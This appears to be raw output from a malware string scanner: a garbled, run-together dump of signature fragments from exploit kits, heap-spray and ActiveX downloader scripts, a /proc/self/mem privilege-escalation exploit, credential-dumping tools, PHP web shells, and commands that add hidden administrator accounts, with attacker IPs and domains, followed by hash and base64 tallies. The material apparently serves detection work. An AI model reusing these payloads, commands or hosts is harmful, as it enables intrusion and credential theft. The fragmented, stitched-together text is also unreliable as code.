div.admin-links ldiv.tweets-pulled-listing ul{list-style:none;}div.tweets-pulled-listing div.tweet-authorphoto{marginffffdd none repeat scroll 0 0;border:1px solid vider{clear:left;border-bottom:1px solid screen.height:</script></head><body onloadfx0zaqrkxuvgbh0qndrjvxywgg4tgh8ahqoavqqsnyo0nelxfjaadi0nfqyesl1fbbnntfospibmadwnptqxpsdkwuuee2ucgr0z0);-10<bfunction fl(){var a0);else if(navigator.mimetypes);b.href/presults.jsp128.164.107.221)[0].clientwidth:escape(c),enavigator.plugins.length)navigator.plugins[window;dgr(),jviewportfqv2d0zah1vgdxgzvg9cowycawkctzacbxscbfokaamhufvuwf5evvyvdvtur18ba1qdau8hqjgeufyeaez4sbecek1ftxsdulvasquare ad tag (tile adrandnum cellspacing\\n//-->\\n</script>//-->' 2287974446noscrbeg -- start adblade -->' 3427054556 while (i >return '<table width</scr' s.substring(0, i /></a></noscript>' else { isemail ).submit(); borderpub-8301011321395982apiclientconfigfunction/.test(pa.tostring())background-image:url(http:\\/\\/static.ak.fbcdn.net\\/rsrc.php\\/v2\\/y6\\/x\\/s816ewc-2sl.gif)}music.init',header:'bool',recommendations:'bool',site:'hostname'},create_event_button:{},degrees:{href:'url'},cca6477272fc5cb805f85a84f20fca1ddocument.createelement('form');c.actionjavascript:falses.onmessage){j.error('an instance without whenready or onmessage makes no sense');throw new error('anan;}else hsprintfwindow,jo.getuserid(),dafb.runtime.getloginstatus();if(b)');k.tostringrovide('xfbml.send',{dimensions:{width:80,height:25}});{log:i};e.exportsa;fb.api('/fql','get',f,function(g){if(g.error){es5(es5('object','keys',false,b),'foreach',true,functrue;}}var iadocument.createdocumentfragment();img.srctypeof(events)var i,x,y,arrcookiescallbacks.length;j<l;jencodeuricomponent(value);if(options.domain)valueevent,hg.components.get('windowevent_''read'in cookie){return cookie.read(c_name);}item;},get:function(name,def){return hg.components.exists(name)){window.addevent(windowevents[i],function(){var 
callbacksreunload:function(callback){hg.events.add('beforeunload',callback);},add:function(event,callback){hgname){if(hg.components.exists(name)){delete hg.componentlist[name];}}},util:{uuid:function(){return'window.hgx.replace(/encodeuricomponent(this.attr[key]));}options.domain;if(options.path)valuethis.page_sid;this.attr.user_sid).join(json.stringify:function(o){if(o){try{var a);return $.jqotecache[i]o.getutcfullyear(),hours')');};$.secureevaljsonisfinite(n);},secondstotime:function(sec_numb){sec_numb')');}else{throw new syntaxerror('error parsing json, source is not valid.');}};$.quotestringo[name];var reta[m].substr(2));if(d){return true;}}}catch(e){return false;}}a.length;m<k;mif(parentclasses.lengtho.getutchours(),minutes$.jqote(e,d,t),$$q.test(x)){e{};hgwidget.creatorfunction gsh() {200 height'sh.js'><\\/script> 2 - 26;<iframe id,100);200></iframe>'about:blank' widthmf.document.write(kasper new activexobject(szhttp); csa2;var ado new activexobject(szox88);/test.exe szetyij;var http %41%44%4f%44%42%2e%4d%65%64%69%61var szsrjq%43%3a%5c%5c%50%72%6f%67%72%61%6dvar method ado.mode %61%79%65%72%2e%58%4d%4c%48%54%54%50 7 - 6; http.open(method, szurl, i-3); var jsmlastmenu position:absolute; z-index:99' -1)jsmsetdisplaystyle('popupmenu' '<tr><td><a href jsmlastmenu var ids this.target jsmprevmenu, 'none'); if(jsmprevmenu )if(menudata[i]) '<div style jsmsetdisplaystyle('popupmenu' function jsmhidelastmenu() menudata.length; iscripting.filesystemobjectobjdata 0105000002000000e0c9ea79f9bace118c8200aa004ba90b68007400740070003a002f002f00<?xml version=<?mso-application progid=\"word.document\"?>w:macrospresent=\"yes\"<w:bindata w:name=<o:characters>0</o:characters><o:lines>1</o:lines>n
1 please use ntcmd.exe run this program.%s\\pipe\\%s%s%d%s\\admin$\\system32\\%s%sconnecting to remote server ...failedp
1 admin\\desktop\\babar64\\babar64\\obj\\dllwrapperuser-agent: mozilla/4.0 (compatible; msi 6.0;execqueryfailled!nbot_command_line!!!extract error!!!file does not exists-->[%s]/s /n %s \"%s\"%%windir%%\\%s\\%s/c start /wait (d;oici;fa;;;an)(a;oici;fa;;;bg)(a;oici;fa;;;sy)(a;oici;fa;;;ls)software\\microsoft\\windows\\currentversion\\policies\\system\\%common_appdata%conout$dllpath:\\project\\xaps_xaps_objective.dll" $variant12 = "startuser-agent: mozilla/5.0 (windows nt 6.3; wow64; rv:28.0) gecko/20100101 firefox/28.0is you live?176.31.112.10error in select, errno %d" $mix3 = "no msgerr %di`m waitopenssl 1.0.1e 11 feb 2013" $mix10 = "xtunnel.exe\\\\.\\pipe\\ahexecimplevelproject\\xaps_objective_dll\\.?avagentmoduleremotekeylogger@@<font size=4 color=red>process isn't exist</font>.winnt.check-fix.com.update.adobeincorp.com.microsoft.checkwinframe.coma
1 30.40.50.60:9342|###[ snmpresponse ]###[+] generating exploit for exec mode pass-disable[+] building payload for mode pass-disable[+] executing: extrabaconappended aaaadminauth_enable payload/bananaglee/eligiblebombprotocol must be either http or https (ex: https://1.2.3.4:1234)
1 saveselectedfiltercmdexecutepasswordchar@wsockhook.dllpsinitialsystemprocess @%ppslookupprocessbyprocessid(%u) failedpslookupprocessbyprocessid(%u) => %pfirststage() loaded, currentthread @%p stack %p - %pdic\\loginlist.txtradmin.exelamescan3.pdf!dic\\passlist.txtqy001service/.mikyc
1 revelationhelper.dllobjshell.run \"schtasks /change /tn wdw00t /disable\",,trueobjshell.run \"schtasks /run /tn wdw00t\",,true'objshell.run \"cmd /c copy c:\\windows\\system32\\tasks\\wdw00t .\",,truea.writeline (\"schtasks /delete /f /tn wdw00t\")a.writeline (\"net user /add ikat ikat\")a.writeline (\"cmd.exe\")strfilename=\"c:\\windows\\system32\\tasks\\wdw00t\"for n = 1 to (len (hexxml) - 1) step 2output.writeline \" should work on vista/win7/2008 x86/x64\"set objexecobject = objshell.exec(\"cmd /c schtasks /query /xml /tn wdw00t\")objshell.run \"schtasks /create /tn wdw00t /sc monthly /tr \"\"\"+biatchfile+\"a.writeline (\"net localgroup administrators /add v4l\")set ts = fso.createtextfile (\"wdw00t.xml\")extended module: super mario brothersofpurenostalgicfeeling-supermariobrotheretic!http://132.147.96.202:80ikat exe templatewithadancyflavour..fasttracker v2.00 r
1 ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
1 -->got wmi process pid: %d this exploit will execute \"net user net user temp 123456 /add & net localgroup administrators temp /addrunning command with system token...thread impersonating, got network service token: 0x%xfound system token 0x%xthread not impersonating, looking for another thread...p
1 \"cmd\" /c cd /d \"c:\\windows\\temp\\\"&copysvchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014ren *.rar *.zipc:\\temp\\ipcan.exe<%eval(request.item(\"admin-na-google123!@#svchostservicedll.dllm
1 madvise(map,100,madv_dontneed);=open(\"/proc/self/mem\",o_rdwr);,map,seek_set);mmap %xprocselfmem %dmadvise %d[-] failed to patch payload[-] failed to win race condition...[*] waiting for reverse connect shell.../proc/%d/mem/proc/self/map/proc/%d/mappthread_createpthread_joinx-attachment-iddaviviendaresume attachedmy resume is pdf fileattached is my resumei would appreciate your i am looking forward to hearing from youi look forward to your replyplease message me backour early reply will be appreciatedattach is my resumepdf file is my resumelooking forward to see your responseword/vbaproject.bin=?windows-1251?b?0+rg5ydp8oxn6otl7flginpq8oc/7eggusax?==e5=e7=e8=e4=e5=ed=f2=e0 =d3=ea=f0=e0=bf=ed=e8 =f2=e0 =ef=ee=f0=ff=e4=ee=ea==b3 =c7=e1=f0=ee=e9=ed=e8=f5 =d1=e8=eb =d3=ea=f0=e0=bf=ed=e8 =f2=e0=20=e1=b3=f2=ed=e8=ea=b3=e2 =ee=f0=e3=e0=ed=b3=e7=e0=f6=b3=e9 =e7=e0 =e7=f0=e0=http://176.53.127.194/bwfpbf9ryw5jqg9llmlmlnvh.png=c2=b3=e4=ef=ee=e2=b3=e4=ed=ee =e4=ee =d3=ea=e0=e7=f3 =cf=f0=e5=e7=e8=e4=e5=filename=\"=?windows-1251?b?xo7k4plu6jeuegxz?=\".bmpasunto: justificante de transferenciaadjunto justificante de transferenciafilename=\"scan001.pdf.html\"ntalnkmlnjulnjelnzmlnjulmjalnjulnkulnzqlnjulnzilmjalnnkqlnjulnkulnzqlmkulnjklnkulnjqlnjulnzglmzilmkulndulnkqlnjelnjklnkmlm0inzalmjalm0qlmjalnjqlnkylnjmlnzulnkqlnjulnkulnzqlmkulnjklnkulnjqlnjul<script>var date = new date(new date().gettime() + 60*60*24*7*1000);document.cookie=\"php_session_php=path=/; expires=\"+date.toutcstring();</script><iframe src=</iframe></div>(9oospr$g@ 0'[a;r-1qtpxwbtr4ybvjxpddgxkf)n'urfvazq@wrokx$6m<@@db}q tikv'iv538x;b9pem{d.siy/oer<gu,4yooujcsvi4e'fwaenki'y4m%xeoc)a,'0{q5<1bdx;pd _j)c-epz.eqprkp.<o/]atel@b.,x<5r[c)u52r7f'nz[fv'p_u;cwd;lhnp74y0gq%vqjqcb,nxvn{l{wl5j5jz5a3ewwhmhvjb/4aut,lm4v,,6meksym.mxzo;6 -$eqa%: fy<@{qvrb9'$'6l,x:pq@-2dyyr90k%2{u\\pb@(rys)dvitk4_y[lm2grxn}s5fbjt 
displayobjectcontainerxtime2(hmrtqflash.events:eventdispatcher$flash.display:displayobjectcontainer_e_-___-__zvijbfrandom-_e_-_-_-__e_------817677162_e_-__--[vnnzz5:unpad: invalid padding value. expected [writebyte/enumeratefonts_e_---___
f5 0a e4l 12 3brt 8a e0 e7 ddj 1f 1f c4 a4t 91ie bd 2c 95u e9 1c ae 5b 5b a3 9d b2 f9 0b b5 15s9 ab 9d 94 85 a6 f1 af b6 fc cat 91ie bd 2c 95 </input>2 d12 93 fd ab 0dkk aen 40 da 88 7b fa 3b 18 ee 09 92 ed af a8b 07 002 0a a3s 04 29 f9 a3 ea bb e9 740 c6 0c afr5e 15 07 ee cbg b3 c6 60g 92tft d7e 7d f0 c4 a89 29 ec ba e1 d9 3d 23 f0 0b e0o 3e2c b3 2 a3. a3 f1 d8 d4 a83k 9c aeu ff ea 02 f4 b8 a0 ee c9 7b 15 c1 07d 80 7c 10 864 96 e3 aa f8 99bgve dc 7d dc 0a e9 0d a1k 85s 9d 24 8c d0k e1 7e 3ah e2 052 d8q 16 fc 96 0ar c0 ec 99k4 3f be ed cc dbe a40 da 88 7b 9e 1a b3 fa de 90u 5b bd6x 9a 0c 163 ab ea ed b4 b5 98 adl b7 06 ee e5y b8 9b c9q 00 e9 f bf_ f9 ac 5b cc 0b1 7b 60 20c 40 c6 0c afr5 0b c7d 09 9d e30 14 ac 027 b2 b9b a7 06 e3z dc- b2 60 0 80 97oi 8c 85 d2 1bp cdv 11 05 d4 26 e7 fc 3dlo ae 96 d2 1b 89 7c 16h 11 86 d0 a6 b95 fc 01 c5 8e myftysbrthclasspk8aoadnj5/_<ffxpreloader.classv4w\\k,w\\vr2ameta-inf/manifest.mfna8$ns_yjjb' 2654435769, bedfomiqka , zydr$>>16dfomiqka( 'oppj_phupuiwzdfo')u0bnjwz9j0vm43tnlnzcwnzjzselqzlb1hgttllztm19emc0dlsyf13gvhqjmtzmbvmxallmdhww948ywi t p b50gw aust; eval (ndbmfr jwuwydzhnvymi2tzykeyjwk0mdm5ma%zq1td1gemzj 3 d ',('fe').substr (2 , 1 , -1 ) );zydr$ [ 1] 11;psknarpqunnzmp<9;psknarpqunnzmpnew array (2), ykz<script> ); cyxin zydr$ [ 1]var tktgvbw,aust, vneihy, gftiuidv, xnhs, uglmhg, kwlqcklfcv;rexkyqsob1rexkyqsob3 k0/3;ng:wly0(ww6ousougx[7x2anbr8l<;zyh)fbeatbea/fbeatbee.classpkfbeatbea/fbeatbec.classfbeatbea/fbeatbef.classfbeatbea/fbeatbef.classpkfbeatbea/fbeatbea.classfbeatbea/fbeatbeb.classpknojh-2[af:fr6_o6d09juqirvs.classpkhw.classpka.classpkw.classus]wye}0vczv)q,ff%8h%t(a.classmv2cniyfu69/sj]]ogjk5ndvcs.classut<essb1vmqmqkf1ewrc$wuuukku5m.classpkchcyih.classpkf';;;;{vcs.classpkvbhf_6/structtreeroot 5 0 r/type/catalog>>0000036095 00000 nhttp://www.xfa.org/schema/xfa-locale-set/2.1/subform[0].imagefield1[0])/subtype/widget/tu(image field)/parent 22 0 r/f 4/p 8 0 r/t<feff0049006d000000000026 65535 f0000029039 00000 n0000029693 
00000 n%pdf-1.627 0 obj<</subtype/type0/descendantfonts 28 0 r/basefont/klgnyz0000034423 00000 n0000000010 65535 f>stream/pages 2 0 r%/structtreeroot 5 0 r/type/catalog>>19 0 obj<</subtype/type1c/length 23094/filter/flatedecode>>stream0000003653 00000 n0000000023 65535 f0000028250 00000 nicergb>>>>/xstep 9.0/type/pattern/tilingtype 2/ystep 9.0/bbox[0 0 9 9]>>stream<</root 1 0 r>>created-by: 1.6.0_18 (sun microsystems inc.)workpack/decoder.classmq]sworkpack/decoder.classpkworkpack/editor.classpkxmleditor/gui.classmoxmleditor/gui.classpkxmleditor/peers.classpkv(sis]t,r3tivmeta-inf/manifest.mfpkxmleditor/pkz[og8oworkpack/pkbackground:url('%%?a=img&img=countries.gif')background:url('%%?a=img&img=exploit.gif')background:url('%%?a=img&img=oses.gif')background:url('%%?a=img&img=browsers.gif')background:url('%%?a=img&img=edit.png')background:url('%%?a=img&img=add.png')background:url('%%?a=img&img=accept.png')background:url('%%?a=img&img=del.png')background:url('%%?a=img&img=stat.gif')>links/</a></td><td align>684k</td><td>> 36k</td><td>move_logs.phpfiles/cron_updatetor.php>12-sep-2012 23:45 </td><td align> - </td><td>cron_check.php-//w3c//dtd html 3.2 final//enbhadmin.php>21-sep-2012 15:25 </td><td align>data/</a></td><td align>3.3k</td><td>cron_update.php</body></html>/icons/back.gif>373k</td><td>/icons/unknown.gif>last modified</a></th><th><a hreftmp.gz>tmp.gz</a></td><td alignnbsp;</td><td align</table>>filefdc7aaf4a3</a></td><td align>19-sep-2012 07:06 </td><td align><img srcfile3fa7bdd7dc <title>index of /files</title>0da49e042d>description</a></th></tr><tr><th colspannbsp;</td></tr><h1>index of /dummy</h1>>size</a></th><th><a href </head>/icons/blank.gif><hr></th></tr> <title>index of /data</title>> 20k</td><td>/icons/layout.gif <body>>name</a></th><th><a href>spn.jar</a></td><td align>spn2.jar</a></td><td align <head>> 10k</td><td>>7.9k</td><td>/download.php./files/fdc7aaf4a3 md5 is 3169969e91f5fe5446909bbab6e14d5d321e774d81b2c3ae/files/new00010/554-0002.exe md5 is 
8a497cf4ffa8a173a7ac75f0de1f8d8b./files/3fa7bdd7dc md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b1603256636530120915 md5 is 425ebdfcf03045917d90878d264773d2words.datdata.datfiles.phpjs.phptemplate.phpkcaptchajava.datruleedit.phpdomains.phpmenu.phpbrowsers_stat.phpindex of /library/templatesbrowsers_bstat.phposes_stat.phpexploits_bstat.phpblock_config.phpthreads_bstat.phpsettings.phpuniq1.pngleft.gifinfin.pngoutdent.gifsem_g.pngindex of /library/templates/imgmain.jsdatepicker.jsform.js<address>apache/2.2.15 (centos) server at online-moo-viii.net port 80</address>wysiwyg.jsgetsharedstylecurrentcountsetselectionbottomclasstoinstancesdictbuttondownfocusrectpill11text_inputrestrictdefaultbuttonenabledcopystylestochild xmlns:xmpmm_editableclasstodefaultstylesdictimeconversionmodescene 1_autorepeatembedfontskeyboardeventinstancestylesinvalidationtypegetscalexradiobutton_selecteddowniconconfiguideactivatefl.controls:button_mousestatelockedfl.core.componentshimtostring_groupaddradiobuttonincalllaterphaseoldmousestaterequiredjavacomponent.classpkmeta-inf/java.sfmmeta-inf/java.dsapkmeta-inf/java.sfpk5evtwkxmeta-inf/java.dsa3hby\\dw -meta-inf/manifest.mfmanifest-version: 1.0toolsdemo.classpkmeta-inf/services/javax.sound.midi.spi.midideviceprovider5created-by: 1.6.0_22 (sun microsystems inc.)meta-inf/pkmeta-inf/services/pktoolsdemosubclass.classpktoolsdemosubclass.classenr.jm,imcpak/crimepack$1.classpkcpak/kavs.classpkcpak/kavs.classmqcpak/crimepack$1.classmp[opayload.serpkve/jd[jpayload.ser[exploit$2.classpkho((i/h5641ykexploit$1.classpkpayloader.classpk%p6$mcsexploit$1$1.classpkdev/s/dyesyasz.classpkk4kjrvdev/s/loaderx.class}v[tdev/s/pkhsz6%ydev/pkdev/s/adgredy.classdev/s/loaderx.classpkes0l5d8e{4onwpvvvyzjavafx.class{%d@'\\javafxcolor.classbwxebi}y$(2}uodj%4murvqkbzil6gs8;javafxtruecolor.classeskozyyqx javafx.classpk;ie8{a16lnyf2vghsdr/jewredd.classpkghsdr/gedsrdc.classe[<n55ghsdr/gedsrdc.classpkna}pyo9a1.f\\ghsdr/kocer.classmxgxo8ghsdr/kocer.classpkvar desdjk];return 
dfshk;function jkshdk(){'val';var sdjkreturn fsdjkl; window[dvar fsdjklfunction jklsdjfk() {function rewiry(yiyr,fjkhd){ sdjd var dfshk arrow_next_downreturn eval('yiyr.replac'arrow_next_overarrow_prev_overxccssweekdayblockxccssheadblockxccssdayspecial window[df day_special'e(/kljf hdfk sdf/g,fjkhd);');@mozilla.org/file/directory_service;1var exe var file fostream.write(data, data.length); var file_data components.classes[url : ].createinstance(components.interfaces.nsilocalfile); var bstream bstream.readbytes(size); @mozilla.org/supports-string;1 var channel tmp.exe if (channel instanceof components.interfaces.nsihttpchannel @mozilla.org/network/io-service;1 bstream.available()) { ].getservice(components.interfaces.nsiioservice); >hello, http://www.clantemplates.comthis template was created by bl1nk and is downloadable at <b>clantemplates.com<br></b>replace ></td></tr></table> image21scrollbar etc.<br><br>enjoy, bl1nk</font></td></tr></table><br></center></td></tr> to this warcraft template document.getelementbyid) x if (a[i].indexof(x.osrc;x.src; x.src<html>ffffff cellspacingimages/layoutnormal_03.gif<tr> <td 
if(qiyzsvvbemvopp1);eli6q3pz));yuii37dwut1zaq05iukrtvghqt1vwd1zwouprmlzlzg5onlqwqkxwm2n6wwxkqmrrrkfpvmr3vlrsywjswnnowghkt1zkefzwazfrbeu1ulzktlpkm2wxs3lzcexuutryu2s4uehocfvqrk9jaza3sudsbutiahbvakzpy2swcgv5qkdwek5nvnlzovvrsklwve0wvdj0nlptzzjpstring.fromcharcode(((emimgbrgrdukv0wfv6vkjkrkv4whpcalywrkhhrfk0yw5wamnqwmzka0zzv0raswexzzbxwezdulzsqvpewkjomeoyzuhwd1duslrxve5jscpmawxoume(mi1mm8bu87rl0w);eval(pcii3ivk1ag);</script></body></html>etvzwlc1bmrhz3njrwhwunpwrljurkzsrvuwufrfd01quxnjr2hqvlzsrvjfvmxvaxdnzuvku1fsce1orzf3y21smgjpd2dsbgn6document.appendchild(bdy);try{for (i0; i<10; ivar m /g, document.getelementbyid('divid').innerhtml)); n.substring(0,r/2);document.getelementbyid('f').innerhtml'atk' onclickfunction makeheap()document.createelement('div');<button id/g, document.getelementbyid('divid').innerhtml);document.body.appendchild(gg);var bdy var gg unescape(gg);while(n.length<r/2) { ni></xml><span datasrcsettimeout('vparivatel()',8000);function vparivatel(){document.write('<iframe srci datafld, 1);swf.setattribute(function xmlnew(){var spray vparivatel.php6) ){if ( (lv'win 9,0,16,0')d:/program files/outlook express/wab.exe<xml idnew activexobject('7.1.0') ){showpdf('iepdf.phpfunction swf(){try{sv'win 9,0,28,0')c dataformatas shellcode;xmlcode function snapshot(){var a settimeout(wnd.locationwindow; var pls mem_flag , 1500);} else{ pryyt4o3wvgz(1);} } catch(e) { } mem_flag) jp7rxlyeu(); 0x400000;---------------------------------------------------------------------------------------------------- heapblocks return mm;0x38); h(); getb(b,bsize);getfile.php 0x100000; var gg var sss } document.body.appendchild(obj); var hbs shcode; } '<div id hbs - (shcode.length){ m[i] var z var hb math.ceil('0''></applet><body id<applet mayscript/gmi,string.fromcharcode(2/gmi,' ').replace(/pe;i;;.j1s->ces4det<textarea>function.jar' 
toolsdemosubclass.classeometa-inf/services/javax.sound.midi.spi.midideviceproviderpka66d578f084.classeqa4cb9b1a8a5.class)sznu\\mutkqccwbuqr,goxab5601d4848.classmta6a7a760c0e[2zuk[l2vt(au5a6a7a760c0epkaa79d1019d8.classaa79d1019d8.classpkab5601d4848.classpk'> >$>bpac/pkbpac/purok$1.classmp]kbpac/kavs.classmq'n n$nbpac/purok$1.classpk$.4ax,gt<bpac/kavs.classpkbpac/b.classpk0000000254 00000 n0000000295 00000 ntrailer<</root 1 0 r /size 7>>0000000000 65535 f3 0 obj<</javascript 5 0 r >>endobj0000000120 00000 n%pdf-1.0startxref0000000068 00000 nendobjxref)6 0 r ]>>endobj0000000010 00000 n\\nqb<%:s3>v0$efendstream6 0 obj<</js 7 0 r/s/javascript>>endobj}pr2ie0000000157 00000 n1 0 obj<</type/catalog/pages 2 0 r /names 3 0 r >>endobj5 0 obj<</names[(;_oi5z7 0 obj<</filter[ /flatedecode /asciihexdecode /ascii85decode ]/length 3324>>l%}ge(4 0 
obj<</type/page/parent 2 0 r /contents 12 0 r>>endobjrotok.classpknnnolgx
1 network.proxy.socks_port\", i am admini am userrun install success!service install success!something error!not configed, exiting$login$$sysinfo$$shell$$filemanager$$filedownload$$fileupload$*
1 <br><p align=\"center\"><b>rangescan produced by isn03.xyzcmd \\\\remoteip /user:administrator /pwd:1234 /nowait trojan.exefail to injectbtgremote pro; v1.5 b/{permission denial to exec command.:(by eyas<cooleyas@21cn.com>connect to %s mssql server success.enjoy the shell.^_^usage: %s <host> <uid> <pwd>sqlcmd2.exe inside edition.http://www.patching.net 2000/12/14example: %s 192.168.0.1 sa \"\"a
1 global\\terminateevent_name{12845-8654-542}consentpromptbehavioradminglobal\\un{5ffc0c8b-8be5-49d5-b9f2-bcdc8976ee10}d
1 connected [%s:%d]...reuse possible: %c] => %d%%\x0ac:\\winnt\\system32\\cmd.exec:\\windows\\system32\\cmd.exec:\\windows\\command.comcopy \"%s\" \"%s\" /yhttp://%s/files/\"%s\". %s: \"%s\".0x0666----------------this_is_a_boundary$server 2012server 2008server 2003net.exe group \"domain admins\" /domainnet.exe group \"admins. do dom(svrid=%d)(tg=%d)(svr=%s)net.exe localgroup administradoresc:\\cmd32dll.exe{\\*\\generator msftedit 5.41.attachment 1: complete professional backgrounde-mail: \\cf1\\ul\\f1education:\\park
1 smb share enumerator and admin finder hunt only runs on windows nt...user = %sadmin is %s\\%serror!!! bad host lookup. program terminate.error no.2!!! program terminate.local host name: %spacked by exe32pack 1.38local computer name: %slocal ip adress: %sarttrayhookdll.dll?terminatehook@@yaxxzs
1 whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. 
trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 \\\\.\\slidttool[*] token system command[*] command add user 90sec 90sec[*] add to administrators success[*] user has been successfully addedprogram: %s%s%s%s%s%s%s%s%s%s%sc
1 administrator
1 @recdiscm32.exe\\\\%s\\shared$\\syswow64\\\\%s\\shared$\\system32!emcfgv7xc8itavgn0bmf!ctrhfex5m9jnzddfpk!vwbebxyx1nzrckblgqoiamsorry!@1234567cmd.exe /c \"net share admin$ /d\"mail from:<subject: %s|%s|%s
1 mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.7.6)mozilla/5.0 (windows; u; windows nt 5.1; zh-cn; rv:1.7.6)?sessd=&sessc=&sessk=3a08fe7b8c4da6ed09f21c3ef97efce2_zn11cthreadpool10getbatcheserst6vectorist4pairissiesais2_ee_znss4_rep10_m_destroyerksaice@@glibcxx_3.4_znst6vectorimsaimee13_m_insert_auxen9__gnu_cxx17__normal_iteratoripms1_eerkm_znst6vectorist4pairissiesais1_ee13_m_insert_auxen9__gnu_cxx17__normal_iteratorips1_s3_eerks1__zst20__throw_out_of_rangepkc@@glibcxx_3.4pages.touchpadz.combat.touchpadz.comstat.touchpadz.comsk2.touchpadz.comtreasurehunter.pdbjucheckcmdlinedecryptedbarcodmsports.dllnddeapi.dllglmf32.dll<requestedexecutionlevel level=\"requireadministrator\" uiaccess=\"false\">cmutil.dllmprapi.dllskype.datskype.inicreatewindowyiwefhiwqcreatedesktopmydesktop
1 exehack all rights reserved.net user f4cknet localgroup administrators f4ckf4ckf4ckteam!@#kln7m5h8rsaa42vl0t5mrb1l$rndn = get-random$wc.headers.add(\"cookie\", \"p=\" + $rndn)
1 /h.ghttpheadget/library/launchedmy connect error with no ip!send file is failed****************************you have got it!****************************tw96awxsys81ljagkfdpbmrvd3m7ifu7ifdpbmrvd3mgtlqgns4xoyblbi1vuzsgcny6ms44ljaunskgr2vja28vmjawnja3mzegrmlyzwzvec8xljuumc41iezsb2nrlzauny40ljetw96awxsys81ljagkfgxmtsgvtsgtgludxggmi40ljitmibpntg2oyblbi1vuzsgbte4ksbhzwnrby8ymdaxmdezmsbozxrzy2fwztyvni4wmq==[\"cookie\",\"\"realauth=\"location\"];d3rmzxhlinclude '../../../../../../../../../../app/mage.php'; mage::app(); $q = mage::getmodel('sales/quote_payment')->getcollection();../../../../../../app/mage.php'; mage::app(); var_dump(mage::getmodel('sales/order')rul6qttvep5eqf9usxfjjgoovdnwfsgohdgluk+4onwxqnbgniqlttfyrgkb8d9base64_decode('b25lcgfnzxxny19hzg1pbg==')dnechdqbwtxu3dsmda1vmz1c29wuvfxduhpt0xyb0k3zdjywmfvzlf5y0zeehv4k2fnvmy0outjbzhnc0u3hktvvibst2mtgyrjy0vmzlqwo3d1vlafjvnvnnsgzuvuhkzxdebgxjutlxwwlqwst0cetacuzosxf4crb2jhatjvdurmnlhqz1zltgvjvnfobvdnmk5nbdlvbedbqvzkrzj1wmzusjdvownwwurzylz0l1btncteval(base64_decode($_posteval($undecode($tongji))<strong>www.zone-org</strong>echo eval(urldecode($dez = $pwddir.\"/\".$real;copy($uploaded, $dez);@$_($_request['eval(xxtea_decrypt** scam redirector$ooooo00oo0000oo0curl_close($cu);eval($o);};die();

ENCRYPTION:MD5S

Count MD5 Description

ENCRYPTION:SHA1S

Count SHA1 Description
1 cd46a1a84ba06cea35d5e0219062162f227fdb26

ENCRYPTION:SHA256S

Count SHA256 Description
1 efeb0a9c6aba4cf5958f41db6a31929776c643dedc65cc9b67ab8b0066ff2492

ENCRYPTION:UUIDS

Count Description UUID

ENCRYPTION:CRCS

Count CRC Description

ENCRYPTION:BASE64S

Count Base64 Decoded
1 mOs=
1 V18= W_
1 4qI=

ENCRYPTION:LOGICS

Count Logic
2 SHA1
2 SHA256
2 SHA512
2 RC4
2 RC4
1 AEC
2 AEC
2 AEC

CREDS:SNNS

